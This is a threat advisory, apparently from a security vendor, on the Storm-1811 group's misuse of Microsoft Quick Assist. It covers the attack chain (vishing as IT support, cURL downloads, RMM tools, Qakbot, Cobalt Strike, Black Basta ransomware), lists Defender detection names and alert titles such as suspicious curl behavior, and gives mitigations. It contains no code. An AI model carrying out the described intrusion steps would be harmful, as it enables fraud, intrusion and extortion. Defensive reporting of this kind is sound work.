Since mid-April 2024, the financially motivated cybercriminal group Storm-1811 has been observed exploiting the Microsoft Quick Assist tool in social engineering attacks. The group, known for deploying Black Basta ransomware, begins its attack chain with voice phishing (vishing) to impersonate trusted contacts and deceive targets into granting remote access to their devices.

Misuse of Microsoft Quick Assist by Storm-1811 Technical Overview

Threat Actor: Storm- 1811

Primary Tool Misused: Microsoft Quick Assist

Malware Deployed: Qakbot, Cobalt Strike, Black Basta ransomware

Attack Vectors: Vishing, Remote Monitoring and Management (RRM) tools, social engineering

Attack Chain:

  1. Initial Access via Vishing:
    • The threat actors initiate contact through voice phishing, pretending to be Microsoft technical support or the target’s IT personnel.
    • They exploit Quick Assist, a legitimate remote support tool pre-installed on Windows 11 devices, to gain control of the target’s system.
  2. Remote Monitoring Tools Deployment:
    • Once access is granted, the attackers use Quick Assist to run scripted cURL commands to download batch files or ZIP files.
    • These files deliver additional malware, including RMM tools like ScreenConnect and NetSupport Manager, and Qakbot.
  3. Further Intrusion and Ransomware Deployment:
    • The attackers perform domain enumeration and lateral movement within the compromised environment using tools like PsExec.
    • They deploy Cobalt Strike for persistence and eventually launch Black Basta ransomware to encrypt data and demand ransom.

Impact:

  • Organizations across various sectors, including manufacturing, construction, food and beverage, and transportation, have been targeted.
  • The attacks can result in significant operational disruption, data loss, and financial loss due to ransom payments and recovery costs.

What Our Threat Intelligence Team is Seeing

Microsoft Defender Antivirus 

Microsoft Defender Antivirus detects Qakbot downloaders, implants, and behavior as the following malware:

  • TrojanDownloader:O97M/Qakbot
  • Trojan:Win32/QBot
  • Trojan:Win32/Qakbot
  • TrojanSpy:Win32/Qakbot
  • Behavior:Win32/Qakbot

Black Basta threat components are detected as:

  • Behavior:Win32/Basta
  • Ransom:Win32/Basta
  • Trojan:Win32/Basta

Microsoft Defender Antivirus detects Beacon running on a victim process with the following signatures:

  • Behavior:Win32/CobaltStrike
  • Backdoor:Win64/CobaltStrike
  • HackTool:Win64/CobaltStrike

Additional Cobalt Strike components are detected with the following signatures:

  • TrojanDropper:PowerShell/Cobacis
  • Trojan:Win64/TurtleLoader.CS
  • Exploit:Win32/ShellCode.BN

Microsoft Defender for Endpoint

Alerts with the following titles in the security center can indicate threat activity on your network: 

  • Suspicious activity using Quick Assist

The following alerts might also indicate activity related to this threat:

  • Suspicious curl behavior
  • A file or network connection related to a ransomware-linked emerging threat activity group detected —This alert captures Storm-1811 activity
  • Ransomware-linked emerging threat activity group Storm-0303 detected — This alert captures some Qakbot distributor activity
  • Possible Qakbot activity
  • Possible NetSupport Manager activity
  • Possibly malicious use of proxy or tunneling tool
  • Suspicious usage of remote management software
  • Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)
  • Human-operated attack using Cobalt Strike
  • Ransomware behavior detected in the file system

What We Suggest to Stop Misuse of Microsoft Quick Assist by Storm-1811

  1. Block or Uninstall Quick Assist:
    • Evaluate the necessity of Quick Assist and other RMM tools in your environment. If not required, block or uninstall them to reduce the attack surface.
  2. Enhance Employee Awareness:
    • Conduct training sessions to educate employees on recognizing vishing and tech support scams. Emphasize the importance of verifying unsolicited support calls.
  3. Implement Multi-Factor Authentication (MFA):
    • Enforce MFA for accessing sensitive systems and accounts to add an additional layer of security.

DIFEND WITH CONFIDENCE

Know The Threats That Matter Right Now—Get Advisories Direct to Your Inbox